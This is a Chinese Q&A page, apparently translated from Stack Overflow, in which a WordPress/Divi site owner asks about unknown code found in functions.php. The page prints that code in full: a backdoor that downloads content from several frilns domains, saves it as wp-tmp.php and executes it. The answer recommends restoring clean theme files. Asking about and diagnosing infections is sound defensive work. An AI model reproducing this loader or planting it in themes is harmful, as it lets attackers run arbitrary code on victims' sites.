php - Wordpress 未知代码函数.php - http://www.frilns.com/code.php
问题描述
我正在开发一个带有 Wordpress 和 Divi 主题的新网站。
今天我在function.php中发现了一个未知代码。当我尝试访问 URL 时,什么也没有发生。
在网站上:https ://themecheck.info/他们说这是一个恶意软件。但我无法确认(https://themecheck.info/fr/score/theme-wordpress-solar-shared-by-vestathemes-com.html)
在另一篇文章中,他们说 Frilins 是一种 Chrome 恶意软件。wordpress 什么都没有。
我怕它被黑了。
$wp_auth_key='3770030e7d87cbaf0baf1';
if (($tmpcontent = @file_get_contents("http://www.frilns.com/code.php") OR $tmpcontent =
@file_get_contents_tcurl("http://www.frilns.com/code.php")) AND stripos($tmpcontent,
$wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.frilns.pw/code.php") AND
stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.frilns.top/code.php") AND
stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND
stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND
stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent,
$wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
我试过这样但没有真正的信息。
谢谢您的帮助
Ĵ
解决方案
您可以将新安装的 Divi 中的默认 functions.php 文件(取自成员区域,即 100% 安全)与您的实际 functions.php 文件进行比较,并查看您当前拥有的代码默认情况下不存在,它应该不。
您可以转到主题选项 -> 更新并回滚到以前的版本,然后再次升级,这将获取干净的新主题文件。
推荐阅读
- python - 我应该如何使用没有超大尺寸的 Tkinter 按钮?
- typescript - 重新定义获取选项类型以接受对象作为正文值
- node.js - nodejs中的AES-256-GCM解密
- go - 为什么即使在功能完成后 go channel 也没有被垃圾收集和关闭
- actions-on-google - 可以从操作控制台导入/导出 Google 操作吗?
- reactjs - 如果使用 useEffect 更改了另一个过滤器,则重置为第一页
- python - 试图发送一个 Scrapy 爬虫来爬取从其第一个目的地拉出的一批链接(递归爬取)。怎么做?
- css - 在头像图像设置高度=自动不起作用
- html - 如果使用 iTextsharp 第一页的某些内容和第二页的某些内容,想要将整个表格 tr 移动到下一页
- perl - 关于 perl 引用优先级的困惑